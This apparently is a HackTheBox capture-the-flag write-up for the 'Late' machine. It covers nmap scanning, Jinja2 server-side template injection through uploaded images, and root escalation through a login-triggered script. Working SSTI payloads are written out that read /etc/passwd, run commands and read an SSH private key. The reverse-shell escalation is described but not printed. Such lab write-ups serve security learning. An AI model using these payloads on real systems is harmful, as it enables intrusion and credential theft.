# HackTheBox - Late ## NMAP ```bash Nmap scan report for 10.10.11.156 Host is up (0.14s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.6 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 02:5e:29:0e:a3:af:4e:72:9d:a4:fe:0d:cb:5d:83:07 (RSA) | 256 41:e1:fe:03:a5:c7:97:c4:d5:16:77:f3:41:0c:e9:fb (ECDSA) |_ 256 28:39:46:98:17:1e:46:1a:1e:a1:ab:3b:9a:57:70:48 (ED25519) 80/tcp open http nginx 1.14.0 (Ubuntu) |_http-favicon: Unknown favicon MD5: 1575FDF0E164C3DB0739CF05D9315BDF | http-methods: |_ Supported Methods: GET HEAD |_http-server-header: nginx/1.14.0 (Ubuntu) |_http-title: Late - Best online image tools Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` ## PORT 80 (HTTP) On port 80 it's nginx hosting a web page having a domain `images.late.htb` Let's add the domain name in `/etc/hosts` file So here let's try uploading an image with a text and see if it actually converts the image into text form I grabbed this image for the test and after uploading, we get a file name `results.txt` with the image text ## Foothold We can now try to test for SSTI since this a flask application as the main page says, jinja2 is normally used for templates, we can try `{{7*'7'}}` and if it returns 7777777 then it's vulnerable to SSTI and is using jinja2 else it would return 49 if it would be using twig https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#jinja2---basic-injection So to make this work, we can take a screenshot of `{{7*'7'}}` on a text editor and save it as an image It works, now it's time to test for command execution. We can use this payload to test if we can can read files ```bash {{ get_flashed_messages.__globals__.__builtins__.open("/etc/passwd").read() }} ``` After uploading this we get the `/etc/passwd` file Now we can't get a reverse shell from where even tho we can execute commands with ```bash {{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }} ``` Which would return us Instead we can grab the ssh key for `svc_acc` ```bash {{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('cat /home/svc_acc/.ssh/id_rsa').read() }} ``` After getting shell, we can check what's running in the background for that we can use `pspy` On looking at the script it looks like a normal ssh alert which is sent to root'users mail but if we notice in pspy that script is being executed whenever we login through ssh So we just need to add shell commands to it and it will be executed, so I'll be adding a bash reverse shell After logging in back the script will be executed and we'll have our reverse shell as root user ## References - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#jinja2---basic-injection - https://www.geeksforgeeks.org/chattr-command-in-linux-with-examples/